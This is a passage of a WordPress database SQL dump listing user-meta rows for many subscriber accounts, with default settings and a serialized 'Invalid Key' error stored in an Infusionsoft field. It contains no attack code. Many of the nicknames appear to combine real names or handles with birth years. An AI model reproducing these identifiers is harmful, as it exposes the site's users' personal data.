(18814, 1439, 'nickname', 'elliotsevers2005'),
(18815, 1439, 'first_name', ''),
(18816, 1439, 'last_name', ''),
(18817, 1439, 'description', ''),
(18818, 1439, 'rich_editing', 'true'),
(18819, 1439, 'comment_shortcuts', 'false'),
(18820, 1439, 'admin_color', 'fresh'),
(18821, 1439, 'use_ssl', '0'),
(18822, 1439, 'show_admin_bar_front', 'true'),
(18823, 1439, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18824, 1439, 'cyb_user_level', '0'),
(18825, 1439, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18826, 1439, 'default_password_nag', '1'),
(18827, 1440, 'nickname', 'lrntofly2008'),
(18828, 1440, 'first_name', ''),
(18829, 1440, 'last_name', ''),
(18830, 1440, 'description', ''),
(18831, 1440, 'rich_editing', 'true'),
(18832, 1440, 'comment_shortcuts', 'false'),
(18833, 1440, 'admin_color', 'fresh'),
(18834, 1440, 'use_ssl', '0'),
(18835, 1440, 'show_admin_bar_front', 'true'),
(18836, 1440, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18837, 1440, 'cyb_user_level', '0'),
(18838, 1440, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18839, 1440, 'default_password_nag', '1'),
(18840, 1441, 'nickname', 'jihawki11958'),
(18841, 1441, 'first_name', ''),
(18842, 1441, 'last_name', ''),
(18843, 1441, 'description', ''),
(18844, 1441, 'rich_editing', 'true'),
(18845, 1441, 'comment_shortcuts', 'false'),
(18846, 1441, 'admin_color', 'fresh'),
(18847, 1441, 'use_ssl', '0'),
(18848, 1441, 'show_admin_bar_front', 'true'),
(18849, 1441, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18850, 1441, 'cyb_user_level', '0'),
(18851, 1441, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18852, 1441, 'default_password_nag', '1'),
(18853, 1442, 'nickname', 'farmiwench1976'),
(18854, 1442, 'first_name', ''),
(18855, 1442, 'last_name', ''),
(18856, 1442, 'description', ''),
(18857, 1442, 'rich_editing', 'true'),
(18858, 1442, 'comment_shortcuts', 'false'),
(18859, 1442, 'admin_color', 'fresh'),
(18860, 1442, 'use_ssl', '0'),
(18861, 1442, 'show_admin_bar_front', 'true'),
(18862, 1442, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18863, 1442, 'cyb_user_level', '0'),
(18864, 1442, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18865, 1442, 'default_password_nag', '1'),
(18866, 1443, 'nickname', 'burnze1964'),
(18867, 1443, 'first_name', ''),
(18868, 1443, 'last_name', ''),
(18869, 1443, 'description', ''),
(18870, 1443, 'rich_editing', 'true'),
(18871, 1443, 'comment_shortcuts', 'false'),
(18872, 1443, 'admin_color', 'fresh'),
(18873, 1443, 'use_ssl', '0'),
(18874, 1443, 'show_admin_bar_front', 'true'),
(18875, 1443, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18876, 1443, 'cyb_user_level', '0'),
(18877, 1443, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18878, 1443, 'default_password_nag', '1'),
(18879, 1444, 'nickname', 'njschor1991'),
(18880, 1444, 'first_name', ''),
(18881, 1444, 'last_name', ''),
(18882, 1444, 'description', ''),
(18883, 1444, 'rich_editing', 'true'),
(18884, 1444, 'comment_shortcuts', 'false'),
(18885, 1444, 'admin_color', 'fresh'),
(18886, 1444, 'use_ssl', '0'),
(18887, 1444, 'show_admin_bar_front', 'true'),
(18888, 1444, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18889, 1444, 'cyb_user_level', '0'),
(18890, 1444, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18891, 1444, 'default_password_nag', '1'),
(18892, 1445, 'nickname', 'arizonasushiboy1969'),
(18893, 1445, 'first_name', ''),
(18894, 1445, 'last_name', ''),
(18895, 1445, 'description', ''),
(18896, 1445, 'rich_editing', 'true'),
(18897, 1445, 'comment_shortcuts', 'false'),
(18898, 1445, 'admin_color', 'fresh'),
(18899, 1445, 'use_ssl', '0'),
(18900, 1445, 'show_admin_bar_front', 'true'),
(18901, 1445, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18902, 1445, 'cyb_user_level', '0'),
(18903, 1445, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18904, 1445, 'default_password_nag', '1'),
(18905, 1446, 'nickname', 'ammar.malik1993'),
(18906, 1446, 'first_name', ''),
(18907, 1446, 'last_name', ''),
(18908, 1446, 'description', ''),
(18909, 1446, 'rich_editing', 'true'),
(18910, 1446, 'comment_shortcuts', 'false'),
(18911, 1446, 'admin_color', 'fresh'),
(18912, 1446, 'use_ssl', '0'),
(18913, 1446, 'show_admin_bar_front', 'true'),
(18914, 1446, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18915, 1446, 'cyb_user_level', '0'),
(18916, 1446, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18917, 1446, 'default_password_nag', '1'),
(18918, 1447, 'nickname', 'jarj34jar1966'),
(18919, 1447, 'first_name', ''),
(18920, 1447, 'last_name', ''),
(18921, 1447, 'description', ''),
(18922, 1447, 'rich_editing', 'true'),
(18923, 1447, 'comment_shortcuts', 'false'),
(18924, 1447, 'admin_color', 'fresh'),
(18925, 1447, 'use_ssl', '0'),
(18926, 1447, 'show_admin_bar_front', 'true'),
(18927, 1447, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18928, 1447, 'cyb_user_level', '0'),
(18929, 1447, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18930, 1447, 'default_password_nag', '1'),
(18931, 1448, 'nickname', 'ashleeh1971'),
(18932, 1448, 'first_name', ''),
(18933, 1448, 'last_name', ''),
(18934, 1448, 'description', ''),
(18935, 1448, 'rich_editing', 'true'),
(18936, 1448, 'comment_shortcuts', 'false'),
(18937, 1448, 'admin_color', 'fresh'),
(18938, 1448, 'use_ssl', '0'),
(18939, 1448, 'show_admin_bar_front', 'true'),
(18940, 1448, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18941, 1448, 'cyb_user_level', '0'),
(18942, 1448, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18943, 1448, 'default_password_nag', '1'),
(18944, 1449, 'nickname', 'daniel.mooar1970'),
(18945, 1449, 'first_name', ''),
(18946, 1449, 'last_name', ''),
(18947, 1449, 'description', ''),
(18948, 1449, 'rich_editing', 'true'),
(18949, 1449, 'comment_shortcuts', 'false'),
(18950, 1449, 'admin_color', 'fresh'),
(18951, 1449, 'use_ssl', '0'),
(18952, 1449, 'show_admin_bar_front', 'true'),
(18953, 1449, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18954, 1449, 'cyb_user_level', '0'),
(18955, 1449, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18956, 1449, 'default_password_nag', '1'),
(18957, 1450, 'nickname', 'tafbaig1975'),
(18958, 1450, 'first_name', ''),
(18959, 1450, 'last_name', ''),
(18960, 1450, 'description', ''),
(18961, 1450, 'rich_editing', 'true'),
(18962, 1450, 'comment_shortcuts', 'false'),
(18963, 1450, 'admin_color', 'fresh'),
(18964, 1450, 'use_ssl', '0'),
(18965, 1450, 'show_admin_bar_front', 'true'),
(18966, 1450, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18967, 1450, 'cyb_user_level', '0'),
(18968, 1450, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18969, 1450, 'default_password_nag', '1'),
(18970, 1451, 'nickname', 'stokes.toni1954'),
(18971, 1451, 'first_name', ''),
(18972, 1451, 'last_name', ''),
(18973, 1451, 'description', ''),
(18974, 1451, 'rich_editing', 'true'),
(18975, 1451, 'comment_shortcuts', 'false'),
(18976, 1451, 'admin_color', 'fresh'),
(18977, 1451, 'use_ssl', '0'),
(18978, 1451, 'show_admin_bar_front', 'true'),
(18979, 1451, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18980, 1451, 'cyb_user_level', '0'),
(18981, 1451, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18982, 1451, 'default_password_nag', '1'),
(18983, 1452, 'nickname', 'j.hacking1974'),
(18984, 1452, 'first_name', ''),
(18985, 1452, 'last_name', ''),
(18986, 1452, 'description', ''),
(18987, 1452, 'rich_editing', 'true'),
(18988, 1452, 'comment_shortcuts', 'false'),
(18989, 1452, 'admin_color', 'fresh'),
(18990, 1452, 'use_ssl', '0'),
(18991, 1452, 'show_admin_bar_front', 'true'),
(18992, 1452, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18993, 1452, 'cyb_user_level', '0'),
(18994, 1452, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18995, 1452, 'default_password_nag', '1'),
(18996, 1453, 'nickname', 'dreddta21958'),
(18997, 1453, 'first_name', ''),
(18998, 1453, 'last_name', ''),
(18999, 1453, 'description', ''),
(19000, 1453, 'rich_editing', 'true'),
(19001, 1453, 'comment_shortcuts', 'false'),
(19002, 1453, 'admin_color', 'fresh'),
(19003, 1453, 'use_ssl', '0'),
(19004, 1453, 'show_admin_bar_front', 'true'),
(19005, 1453, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19006, 1453, 'cyb_user_level', '0'),
(19007, 1453, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19008, 1453, 'default_password_nag', '1'),
(19009, 1454, 'nickname', 'meghanb1962'),
(19010, 1454, 'first_name', ''),
(19011, 1454, 'last_name', ''),
(19012, 1454, 'description', ''),
(19013, 1454, 'rich_editing', 'true'),
(19014, 1454, 'comment_shortcuts', 'false'),
(19015, 1454, 'admin_color', 'fresh'),
(19016, 1454, 'use_ssl', '0'),
(19017, 1454, 'show_admin_bar_front', 'true'),
(19018, 1454, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19019, 1454, 'cyb_user_level', '0'),
(19020, 1454, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19021, 1454, 'default_password_nag', '1'),
(19022, 1455, 'nickname', 'jagerardi1967'),
(19023, 1455, 'first_name', ''),
(19024, 1455, 'last_name', ''),
(19025, 1455, 'description', ''),
(19026, 1455, 'rich_editing', 'true'),
(19027, 1455, 'comment_shortcuts', 'false'),
(19028, 1455, 'admin_color', 'fresh'),
(19029, 1455, 'use_ssl', '0'),
(19030, 1455, 'show_admin_bar_front', 'true'),
(19031, 1455, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19032, 1455, 'cyb_user_level', '0'),
(19033, 1455, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19034, 1455, 'default_password_nag', '1'),
(19035, 1456, 'nickname', 'debrachristopher381974'),
(19036, 1456, 'first_name', ''),
(19037, 1456, 'last_name', ''),
(19038, 1456, 'description', ''),
(19039, 1456, 'rich_editing', 'true'),
(19040, 1456, 'comment_shortcuts', 'false'),
(19041, 1456, 'admin_color', 'fresh'),
(19042, 1456, 'use_ssl', '0'),
(19043, 1456, 'show_admin_bar_front', 'true');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(19044, 1456, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19045, 1456, 'cyb_user_level', '0'),
(19046, 1456, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19047, 1456, 'default_password_nag', '1'),
(19048, 1457, 'nickname', 'joshsinclair1976'),
(19049, 1457, 'first_name', ''),
(19050, 1457, 'last_name', ''),
(19051, 1457, 'description', ''),
(19052, 1457, 'rich_editing', 'true'),
(19053, 1457, 'comment_shortcuts', 'false'),
(19054, 1457, 'admin_color', 'fresh'),
(19055, 1457, 'use_ssl', '0'),
(19056, 1457, 'show_admin_bar_front', 'true'),
(19057, 1457, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19058, 1457, 'cyb_user_level', '0'),
(19059, 1457, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19060, 1457, 'default_password_nag', '1'),
(19061, 1458, 'nickname', 'terence.chambers1977'),
(19062, 1458, 'first_name', ''),
(19063, 1458, 'last_name', ''),
(19064, 1458, 'description', ''),
(19065, 1458, 'rich_editing', 'true'),
(19066, 1458, 'comment_shortcuts', 'false'),
(19067, 1458, 'admin_color', 'fresh'),
(19068, 1458, 'use_ssl', '0'),
(19069, 1458, 'show_admin_bar_front', 'true'),
(19070, 1458, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19071, 1458, 'cyb_user_level', '0'),
(19072, 1458, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19073, 1458, 'default_password_nag', '1'),
(19074, 1459, 'nickname', 'lukehvac1990'),
(19075, 1459, 'first_name', ''),
(19076, 1459, 'last_name', ''),
(19077, 1459, 'description', ''),
(19078, 1459, 'rich_editing', 'true'),
(19079, 1459, 'comment_shortcuts', 'false'),
(19080, 1459, 'admin_color', 'fresh'),
(19081, 1459, 'use_ssl', '0'),
(19082, 1459, 'show_admin_bar_front', 'true'),
(19083, 1459, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19084, 1459, 'cyb_user_level', '0'),
(19085, 1459, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19086, 1459, 'default_password_nag', '1'),
(19087, 1460, 'nickname', 'dagret1998'),
(19088, 1460, 'first_name', ''),
(19089, 1460, 'last_name', ''),
(19090, 1460, 'description', ''),
(19091, 1460, 'rich_editing', 'true'),
(19092, 1460, 'comment_shortcuts', 'false'),
(19093, 1460, 'admin_color', 'fresh'),
(19094, 1460, 'use_ssl', '0'),
(19095, 1460, 'show_admin_bar_front', 'true'),
(19096, 1460, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19097, 1460, 'cyb_user_level', '0'),
(19098, 1460, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19099, 1460, 'default_password_nag', '1'),
(19100, 1461, 'nickname', 'davidagret1997'),
(19101, 1461, 'first_name', ''),
(19102, 1461, 'last_name', ''),
(19103, 1461, 'description', ''),
(19104, 1461, 'rich_editing', 'true'),
(19105, 1461, 'comment_shortcuts', 'false'),
(19106, 1461, 'admin_color', 'fresh'),
(19107, 1461, 'use_ssl', '0'),
(19108, 1461, 'show_admin_bar_front', 'true'),
(19109, 1461, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19110, 1461, 'cyb_user_level', '0'),
(19111, 1461, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19112, 1461, 'default_password_nag', '1'),
(19113, 1462, 'nickname', 'contact1971'),
(19114, 1462, 'first_name', ''),
(19115, 1462, 'last_name', ''),
(19116, 1462, 'description', ''),
(19117, 1462, 'rich_editing', 'true'),
(19118, 1462, 'comment_shortcuts', 'false'),
(19119, 1462, 'admin_color', 'fresh'),
(19120, 1462, 'use_ssl', '0'),
(19121, 1462, 'show_admin_bar_front', 'true'),
(19122, 1462, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19123, 1462, 'cyb_user_level', '0'),
(19124, 1462, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19125, 1462, 'default_password_nag', '1'),
(19126, 1463, 'nickname', 'tuanhuynh991966'),
(19127, 1463, 'first_name', ''),
(19128, 1463, 'last_name', ''),
(19129, 1463, 'description', ''),
(19130, 1463, 'rich_editing', 'true'),
(19131, 1463, 'comment_shortcuts', 'false'),
(19132, 1463, 'admin_color', 'fresh'),
(19133, 1463, 'use_ssl', '0'),
(19134, 1463, 'show_admin_bar_front', 'true'),
(19135, 1463, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19136, 1463, 'cyb_user_level', '0'),
(19137, 1463, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19138, 1463, 'default_password_nag', '1'),
(19139, 1464, 'nickname', 'alda_celia1991'),
(19140, 1464, 'first_name', ''),
(19141, 1464, 'last_name', ''),
(19142, 1464, 'description', ''),
(19143, 1464, 'rich_editing', 'true'),
(19144, 1464, 'comment_shortcuts', 'false'),
(19145, 1464, 'admin_color', 'fresh'),
(19146, 1464, 'use_ssl', '0'),
(19147, 1464, 'show_admin_bar_front', 'true'),
(19148, 1464, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19149, 1464, 'cyb_user_level', '0'),
(19150, 1464, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19151, 1464, 'default_password_nag', '1'),
(19152, 1465, 'nickname', 'lesliern921953'),
(19153, 1465, 'first_name', ''),
(19154, 1465, 'last_name', ''),
(19155, 1465, 'description', ''),
(19156, 1465, 'rich_editing', 'true'),
(19157, 1465, 'comment_shortcuts', 'false'),
(19158, 1465, 'admin_color', 'fresh'),
(19159, 1465, 'use_ssl', '0'),
(19160, 1465, 'show_admin_bar_front', 'true'),
(19161, 1465, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19162, 1465, 'cyb_user_level', '0'),
(19163, 1465, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19164, 1465, 'default_password_nag', '1'),
(19165, 1466, 'nickname', 'schulzsnoop2006'),
(19166, 1466, 'first_name', ''),
(19167, 1466, 'last_name', ''),
(19168, 1466, 'description', ''),
(19169, 1466, 'rich_editing', 'true'),
(19170, 1466, 'comment_shortcuts', 'false'),
(19171, 1466, 'admin_color', 'fresh'),
(19172, 1466, 'use_ssl', '0'),
(19173, 1466, 'show_admin_bar_front', 'true'),
(19174, 1466, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19175, 1466, 'cyb_user_level', '0'),
(19176, 1466, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19177, 1466, 'default_password_nag', '1'),
(19178, 1467, 'nickname', 'chvy2500hd1984'),
(19179, 1467, 'first_name', ''),
(19180, 1467, 'last_name', ''),
(19181, 1467, 'description', ''),
(19182, 1467, 'rich_editing', 'true'),
(19183, 1467, 'comment_shortcuts', 'false'),
(19184, 1467, 'admin_color', 'fresh'),
(19185, 1467, 'use_ssl', '0'),
(19186, 1467, 'show_admin_bar_front', 'true'),
(19187, 1467, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19188, 1467, 'cyb_user_level', '0'),
(19189, 1467, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19190, 1467, 'default_password_nag', '1'),
(19191, 1468, 'nickname', 'jsheffo1962'),
(19192, 1468, 'first_name', ''),
(19193, 1468, 'last_name', ''),
(19194, 1468, 'description', ''),
(19195, 1468, 'rich_editing', 'true'),
(19196, 1468, 'comment_shortcuts', 'false'),
(19197, 1468, 'admin_color', 'fresh'),
(19198, 1468, 'use_ssl', '0'),
(19199, 1468, 'show_admin_bar_front', 'true'),
(19200, 1468, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19201, 1468, 'cyb_user_level', '0'),
(19202, 1468, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19203, 1468, 'default_password_nag', '1'),
(19204, 1469, 'nickname', 'homada1954'),
(19205, 1469, 'first_name', ''),
(19206, 1469, 'last_name', ''),
(19207, 1469, 'description', ''),
(19208, 1469, 'rich_editing', 'true'),
(19209, 1469, 'comment_shortcuts', 'false'),
(19210, 1469, 'admin_color', 'fresh'),
(19211, 1469, 'use_ssl', '0'),
(19212, 1469, 'show_admin_bar_front', 'true'),
(19213, 1469, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19214, 1469, 'cyb_user_level', '0'),
(19215, 1469, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19216, 1469, 'default_password_nag', '1'),
(19217, 1470, 'nickname', 'adam.bray1984'),
(19218, 1470, 'first_name', ''),
(19219, 1470, 'last_name', ''),
(19220, 1470, 'description', ''),
(19221, 1470, 'rich_editing', 'true'),
(19222, 1470, 'comment_shortcuts', 'false'),
(19223, 1470, 'admin_color', 'fresh'),
(19224, 1470, 'use_ssl', '0'),
(19225, 1470, 'show_admin_bar_front', 'true'),
(19226, 1470, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19227, 1470, 'cyb_user_level', '0'),
(19228, 1470, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19229, 1470, 'default_password_nag', '1'),
(19230, 1471, 'nickname', 'twitchdelete2003'),
(19231, 1471, 'first_name', ''),
(19232, 1471, 'last_name', ''),
(19233, 1471, 'description', ''),
(19234, 1471, 'rich_editing', 'true'),
(19235, 1471, 'comment_shortcuts', 'false'),
(19236, 1471, 'admin_color', 'fresh'),
(19237, 1471, 'use_ssl', '0'),
(19238, 1471, 'show_admin_bar_front', 'true'),
(19239, 1471, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19240, 1471, 'cyb_user_level', '0'),
(19241, 1471, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19242, 1471, 'default_password_nag', '1'),
(19243, 1472, 'nickname', 'tessagallagher231987'),
(19244, 1472, 'first_name', ''),
(19245, 1472, 'last_name', ''),
(19246, 1472, 'description', ''),
(19247, 1472, 'rich_editing', 'true'),
(19248, 1472, 'comment_shortcuts', 'false'),
(19249, 1472, 'admin_color', 'fresh'),
(19250, 1472, 'use_ssl', '0'),
(19251, 1472, 'show_admin_bar_front', 'true'),
(19252, 1472, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19253, 1472, 'cyb_user_level', '0'),
(19254, 1472, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19255, 1472, 'default_password_nag', '1'),
(19256, 1473, 'nickname', 'rileymurphy1982'),
(19257, 1473, 'first_name', ''),
(19258, 1473, 'last_name', ''),
(19259, 1473, 'description', ''),
(19260, 1473, 'rich_editing', 'true'),
(19261, 1473, 'comment_shortcuts', 'false'),
(19262, 1473, 'admin_color', 'fresh'),
(19263, 1473, 'use_ssl', '0'),
(19264, 1473, 'show_admin_bar_front', 'true'),
(19265, 1473, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19266, 1473, 'cyb_user_level', '0'),
(19267, 1473, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19268, 1473, 'default_password_nag', '1'),
(19269, 1474, 'nickname', 'terraccino1990'),
(19270, 1474, 'first_name', ''),
(19271, 1474, 'last_name', ''),
(19272, 1474, 'description', ''),
(19273, 1474, 'rich_editing', 'true'),
(19274, 1474, 'comment_shortcuts', 'false'),
(19275, 1474, 'admin_color', 'fresh'),
(19276, 1474, 'use_ssl', '0'),
(19277, 1474, 'show_admin_bar_front', 'true'),
(19278, 1474, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19279, 1474, 'cyb_user_level', '0'),
(19280, 1474, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19281, 1474, 'default_password_nag', '1'),
(19282, 1475, 'nickname', 'adrienneaston1961'),
(19283, 1475, 'first_name', ''),
(19284, 1475, 'last_name', ''),
(19285, 1475, 'description', ''),
(19286, 1475, 'rich_editing', 'true'),
(19287, 1475, 'comment_shortcuts', 'false'),
(19288, 1475, 'admin_color', 'fresh'),
(19289, 1475, 'use_ssl', '0'),
(19290, 1475, 'show_admin_bar_front', 'true'),
(19291, 1475, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19292, 1475, 'cyb_user_level', '0'),
(19293, 1475, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19294, 1475, 'default_password_nag', '1'),
(19295, 1476, 'nickname', 'sln_nguyen1974'),
(19296, 1476, 'first_name', ''),
(19297, 1476, 'last_name', ''),
(19298, 1476, 'description', ''),
(19299, 1476, 'rich_editing', 'true'),
(19300, 1476, 'comment_shortcuts', 'false'),
(19301, 1476, 'admin_color', 'fresh'),
(19302, 1476, 'use_ssl', '0'),
(19303, 1476, 'show_admin_bar_front', 'true'),
(19304, 1476, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19305, 1476, 'cyb_user_level', '0'),
